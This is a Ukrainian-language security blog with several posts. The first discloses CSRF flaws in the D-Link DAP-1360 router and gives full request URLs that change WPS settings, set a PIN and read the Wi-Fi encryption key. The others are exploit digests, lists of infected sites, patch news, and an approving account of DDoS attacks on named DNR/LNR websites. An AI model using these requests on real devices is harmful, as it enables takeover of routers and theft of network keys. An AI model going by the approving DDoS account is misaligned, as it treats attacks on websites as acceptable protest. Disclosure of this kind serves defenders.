Websecurity - Веб безпека

Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив Cross-Site Request Forgery уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router).

CSRF (WASC-09):

В розділі Wi-Fi - WPS можна змінити параметр WPS Enable:

Увімкнути:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:true}}

Вимкнути:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:false,%22WscConfigured%22:true}}

Можна відмінити конфігурацію (Reset to unconfigured):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:false}}

Можна прочитати дані про конфігурацію в Information - Refresh. Через XSS атаку з цієї сторінки можна отримати дані про ключ Encryption key (це спрацює навіть при вимкненому WPS):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_config_action=1&res_config_id=35&res_struct_size=0

Можна змінити метод в Connection - WPS Method:

PBC:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PBC%22}}

PIN:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PIN%22,%22WscPin%22:%2211111111%22}}

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

В даній добірці експлоіти в веб додатках:

• NXFilter 3.0.3 - Multiple XSS Vulnerabilities (деталі)
• NXFilter 3.0.3 - CSRF Vulnerabilities (деталі)
• Google AdWords <= 6.2.0 API client libraries - XML eXternal Entity Injection (XXE) (деталі)
• Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload (деталі)
• D-Link DIR-880L - Multiple Buffer Overflow Vulnerabilities (деталі)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://gp.gov.ua - інфікований державний сайт - інфекція була виявлена 26.01.2016. Зараз сайт не входить до переліку підозрілих.
• http://prof-legion.com.ua - інфекція була виявлена 26.01.2016. Зараз сайт входить до переліку підозрілих.
• http://medsvit.com.ua - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
• http://2service.com.ua - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
• http://kino-planeta.com - інфекція була виявлена 26.01.2016. Зараз сайт входить до переліку підозрілих.
• http://redhost.info - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
• http://atmedia.com.ua - інфекція була виявлена 26.01.2016. Зараз сайт входить до переліку підозрілих.
• http://7ba.org - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
• http://akciiskidki.com - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
• http://architector.dp.ua - інфекція була виявлена 26.01.2016. Зараз сайт входить до переліку підозрілих.

Виявлена можливість виконання коду в Microsoft Silverlight.

Уразливі продукти: Microsoft Silverlight 5 для Windows і Mac до версії 5.1.41212.0.

Виконання коду в браузерах з плагіном Silverlight.

• Microsoft Security Bulletin MS16-006 - Critical Security Update for Silverlight to Address Remote Code Execution (3126036) (деталі)

В даній добірці уразливості в веб додатках:

• HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access, Execution of Arbitrary Code (деталі)
• Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension (деталі)
• Multiple SQL Injections in Dolibarr ERP & CRM (деталі)
• Vulnerability in php-ZendFramework (деталі)
• Struts 2.3.16.2 GA release available - security fix (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Newsletter, Download Manager, Yoast Google Analytics і темі Daily Edition. Для котрих з’явилися експлоіти.

• WordPress Newsletter 2.6.x / 2.5.x Open Redirect (деталі)
• WordPress Download Manager 2.7.2 Privilege Escalation (деталі)
• WordPress Yoast Google Analytics 5.3.2 Cross Site Scripting (деталі)
• WordPress Daily Edition 1.6.2 SQL Injection (деталі)
• WordPress Daily Edition Theme 1.6.2 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У грудні вже відбувалися DDoS атаки на сайти ДНР і ЛНР. Розповім про DDoS атаки на сайти цих терористичних організацій, що мали місце у січні.

Це DDoS атаки на різні сайти ДНР і ЛНР, які ГПУ визнала терористичними організаціями, а також на сайти, які підтримують їх. Що були проведені Українськими Кібер Військами.

DDoS на rv.org.ru - 01-15.01.2016
DDoS на cikdnr.ru - 01-15.01.2016
DDoS на cik-lnr.info - 01-15.01.2016
DDoS на без-вести.рф - 01-15.01.2016
DDoS на ungu.org - 01-15.01.2016
DDoS на bne.su - 01-15.01.2016
DDoS на dnrpress.ru - 01-15.01.2016
DDoS на naspravdi.info - 01-15.01.2016
DDoS на europeanfront.info - 01-15.01.2016
DDoS на batalyonmoskva.ru - 01-15.01.2016

Та інші сайти ДНР і ЛНР.

Таким чином українські хакери висловили протест проти цих незаконних організацій на їх сайтах. Деякі з них тимчасово не працювали, а деякі сайти припинили роботу.

У січні, 06.01.2016, вийшла нова версія WordPress 4.4.1.

WordPress 4.4.1 це багфікс та секюріті випуск нової 4.4 серії. В якому розробники виправили 52 баги та 1 уразливість. Це Cross-Site Scripting уразливість, а також є Full path disclosure, що розробники типово віднесли до багів.

Також в цей день вийшли WordPress 4.0.9, 4.1.9, 4.2.6 і 4.3.2.

У січні місяці Microsoft випустила 9 патчів. Що менше ніж у грудні.

У січневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 9 бюлетенів по безпеці. Що закривають численні уразливості в програмних продуктах компанії. Шість патчів закривають критичні уразливості та три патчі закривають важливі уразливості.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows Vista, 2008, 7, 2008 R2, 8, 2012, RT, 8.1, RT 8.1 та 10. А також Microsoft Office, Internet Explorer і Edge, SharePoint Server, JScript і VBScript, Silverlight, Exchange Server.

У грудні, 08.12.2015, вийшла нова версія WordPress 4.4.

WordPress 4.4 це перший випуск нової 4.4 серії. В ній додано чимало покращень порівняно з попередніми версіями движка, а також виправлено чимало багів.

Серед головних покращень зокрема можна відзначити нову тему Twenty Sixteen, чуткі зображення (що адаптуються під будь-які пристрої з різними дисплеями), покращення ембедінгу та інше.

Окрім покращень для користувачів також було зроблено багато покращень для розробників.